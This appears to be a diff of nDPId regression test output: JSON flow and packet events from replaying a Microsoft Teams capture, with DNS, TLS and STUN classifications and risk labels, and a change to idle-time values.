+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2565,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1587041693869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693869,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShfAqAEGNHL6mMNeAbvdNMkY3FwAm1AQIABWvAAA"} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2567,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1587041693893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693893,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0NypAAGwG5t80cvqZwKgBBgG7w3QJhgXYjJLL5oAS\/\/9RUwAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2568,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1587041693893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693893,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShbAqAEGNHL6mcN0AbuMksvmCYYF2VAQIAByEgAA"} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} +01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694219,"flow_last_seen":1587041694219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041694219,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1587041694219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041694219,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9w\/AqAEGNHJNiOyXAbs8mpamAAAAALAC\/\/8lfgAAAgQFtAEDAwUBAQgKMITbvgAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1587041694221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1587041694221,"pkt":"EBMx8Tl2KDc3AG3ICABFAABWS5cAAP8R7KfAqAEGwKgBAe2lADUAQpDJn88BAAABAAAAAAAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAQ=="} 00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1587041694234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1587041694234,"pkt":"KDc3AG3IEBMx8Tl2CABFAACixyFAADkR9tHAqAEBwKgBBgA17aUAjgAAn8+BgAABAAAAAQAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAcAoAAYAAQAAAA4AQARwcmQxDmF6dXJlZG5zLWNsb3VkwDEGbXNuaHN0CW1pY3Jvc29mdANjb20AfaP8PAAAA4QAAAEsAAk6gAAAADw="} 00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041694234,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2637,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041694262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0VplAAGwGdII0ck2IwKgBBgG77Jdw4z8APJqWp4AS\/\/+58wAAAgQFoAEDAwgBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2638,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041694262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG9yfAqAEGNHJNiOyXAbs8mpancOM\/AVAQIADasgAA"} -00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2637,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1587041694262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041694262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0VplAAGwGdII0ck2IwKgBBgG77Jdw4z8APJqWp4AS\/\/+58wAAAgQFoAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2638,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1587041694262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041694262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG9yfAqAEGNHJNiOyXAbs8mpancOM\/AVAQIADasgAA"} +00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041694611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041694571,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -484,7 +484,7 @@ 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2685,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1587041695432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041695432,"pkt":"EBMx8Tl2KDc3AG3ICABFAACA0aoAAEARtpnAqAEGNHL8CMNgDZcAbO2O\/xAAYN6qKWcI9wj8AQEARCESpEKBJ1p+KLNk2I89FPmAcAAEAAAABwAgAAgAASyFFWBYSoA3AAQAAAACgDYABAAAAAEACAAUmYtT\/sgffZE\/GPjMTGRSk5h1N+2AKAAEPqesNg=="} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2688,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1587041695433,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041695433,"pkt":"EBMx8Tl2KDc3AG3ICABFAACAFs8AAEARcWjAqAEGNHL8FcN0DZgAbMYz\/xAAYGUfNM4ueRX8AQEARCESpEK59F1PLtIJs2rQCYqAcAAEAAAABwAgAAgAASyKFWBYV4A3AAQAAAACgDYABAAAAAEACAAUb+d2GMvNHhGxBtT1sjJNLSVYAvSAKAAEqoFJXQ=="} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2696,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZh4AAEARkejAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMyucAAEARLR\/AqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2699,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041695611} @@ -493,11 +493,11 @@ 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1587041695890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695890,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMMbQAAEARxlLAqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2715,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041696611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2715,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041696574,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697061,"flow_last_seen":1587041697061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041697061,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1587041697061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041697061,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyYAbtVmTcwAAAAALAC\/\/8wcwAAAgQFtAEDAwUBAQgKMITmwQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041697091,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8X+VAAG4GOLAoT4opwKgBBgG77Jhhqm+9VZk3MaASIADeAQAAAgQFoAEDAwgEAggKC\/ZmGDCE5sE="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041697091,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyYAbtVmTcxYapvvoAQEAkclQAAAQEICjCE5t4L9mYY"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 